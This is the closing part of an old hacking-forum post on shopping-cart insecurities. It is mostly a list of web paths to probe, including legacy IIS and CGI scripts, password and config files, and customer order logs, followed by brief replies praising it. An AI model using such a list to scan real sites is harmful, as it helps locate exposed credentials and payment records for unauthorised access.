/cgi-bin/rwwwshell.pl
/cgi-bin/search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin/textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/userfile.dat
/cgi-bin/view-source
/cgi-bin/visadmin.exe
/cgi-bin/w3-msql/
/cgi-bin/webbbs.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webplus
/cgi-bin/websendmail
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/whois_raw.cgi
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/www-sql
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.pl
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-local
/cgi-shl/win-c-sample.exe
/cgi-src
/cgi-src/phf.c
/cgi-win
/cgi-win/uploader.exe
/cgibin
/com1
/com2
/com3
/com4
/con/con
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/default.asp.
/default.asp::$DATA
/doc
/iisadmpwd/aexp2.htr
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/iissamples/query.asp
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/sdk/asp/docs/codebrws.asp
/log
/logs
/mall_log_files/order.log
/manage/cgi/cgiproc
/msadc/Samples/SELECTOR/showcode.asp
/msadc/msadcs.dll
/msads/Samples/SELECTOR/showcode.asp
/ncl_items.html
/order/order.log
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/orders/order.log
/orders/orders.txt
/ping all
/ping?SomeCrapHere
/piranha/secure/passwd.php3
/pw/storemgr.pw
/quikstore.cfg
/samples/search/queryhit.htm
/scripts
/scripts/CGImail.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe/cart32clientlist
/scripts/cmd.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/dbman/db.cgi?db=invalid-db
/scripts/emurl/RECMAN.dll
/scripts/fpcount.exe
/scripts/iisadmin/ism.dll?http/dir
/scripts/issadmin/bdir.htr
/scripts/no-such-file.pl
/scripts/proxy/w3proxy.dll
/scripts/slxweb.dll
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/uploadn.asp
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wsisa.dll
/search97.vts
/server-status
/showfile.asp
/ssi/envout.bat
/ws_ftp.ini
/~
/~bin
/~guest
/~log
/~logs
/~lp
/~named
/~root
/~test
/~tmp

--

Most of all shopping carts are vuln in one way or another, its just finding a
way around them, if the admins were to set the right permissions, just
being smart is the key.

That concludes The explaination of Shopping Carts and their insecurities.

Regards
~Faceless Master

FireAlwaysWorks

Jan 13 2004, 06:37 PM

Yeah I am getting really into SQL injection. This is awesome, I think I might write a perl script for this one.

thanks dude.

GSecur

Jan 13 2004, 06:45 PM

Good stuff, Archived

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.